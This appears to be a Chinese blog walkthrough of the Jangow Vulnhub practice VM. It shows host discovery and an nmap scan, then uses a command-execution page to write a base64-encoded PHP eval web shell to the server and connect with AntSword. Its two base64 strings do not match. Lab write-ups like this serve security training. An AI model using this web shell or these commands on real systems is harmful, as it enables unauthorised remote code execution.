jangow靶机渗透

最新推荐文章于 2024-07-14 16:55:10 发布
最新推荐文章于 2024-07-14 16:55:10 发布
阅读量958 收藏
点赞数
文章标签: php linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/122650957
版权

今天给大家带来一个简单难度的靶机
首先主机扫描
netdiscover -i eth0 192.168.1.1/24
扫出靶机地址为
192.168.1.13
nmap 扫描
nmap -sV -p 0-6550 192.168.1.13

Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 14:13 CST
Nmap scan report for 192.168.1.13
Host is up (0.00071s latency).
Not shown: 6549 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
MAC Address: 00:0C:29:59:F7:8E (VMware)
Service Info: Host: 127.0.0.1; OS: Unix

直接访问80端口,发现busque页面存在rce
在这里插入图片描述

直接通过echo命令base64编码下写入一句话
将这段代码进行base64编码

<?php @eval($_POST['cmd']); ?>

PD9AZXZhbCgkX1BPU1RbJ21vb24nXSk7Pz4g
通过echo 命令写入
echo “PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Cj8+”|base64 -d >shell9.php

蚁剑连接,获取flag
在这里插入图片描述

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jangow-01-1.0.1
qq_46140711的博客
09-22 1171
jangow-01-1.0.1靶机练习
jangow靶机攻击流程
03-24
在这个“jangow靶机攻击流程”中,我们学习了如何逐步渗透一个靶机系统,从信息收集、漏洞利用到权限提升的过程。以下是每个步骤的详细解释: 步骤一:首先,设置靶机网络为桥接模式,并获取其IP地址。这是攻击前的...
靶机渗透练习18-Jangow
hirak0的博客
04-16 494
靶机描述 靶机地址:https://www.vulnhub.com/entry/jangow-101,754/ Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v
Jangow-1.0.1靶机
最新发布
m0_61995767的博客
07-14 298
Jangow-1.0.1打靶记录
【Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 685
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
Vulnhub靶机JANGOW_ 1.0.1
LainWith的博客
10-06 1161
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3012
一次打靶记录。
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub1:Jangow: 1.0.1靶机入侵
g457499940的专栏
08-12 719
网络安全
靶机渗透日记 Jangow
Anonymous
02-10 290
ip 端口 测试发现不能匿名登录 ftp 目录扫描 发现敏感文件 .backup 访问 浏览网站页面,发现其中一个页面可以执行命令 利用命令执行无法反弹shell,生成一句话 在 /home/jangow01 得到 flag1 发现 443 端口没有被做限制 反弹shell 发现存在 jangow01 用户 使用 .backup 里的账号密码尝试登录 提权 可以看到可以使用 dirtycow 进行提权 ,靶机直接死机 换成 CVE-201..
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1910
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
jangow靶机实验实战演练
lianliandad的博客
11-02 862
Ubuntu 16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1121
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
靶场练习No.1 Vulnhub靶场JANGOW01
hljzzj的博客
01-13 3106
2022年开始了,去年的6月份开始断断续续学习了半年的渗透知识,为了能持之以恒我恢复了以前不用的公众号,将我所学的内容用练习靶机的方式发布出来,也许会帮助到想入门的小伙伴们,也为了监督自己,今年的目标是200个靶机练习,小伙伴们让我们一起卷起来吧!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值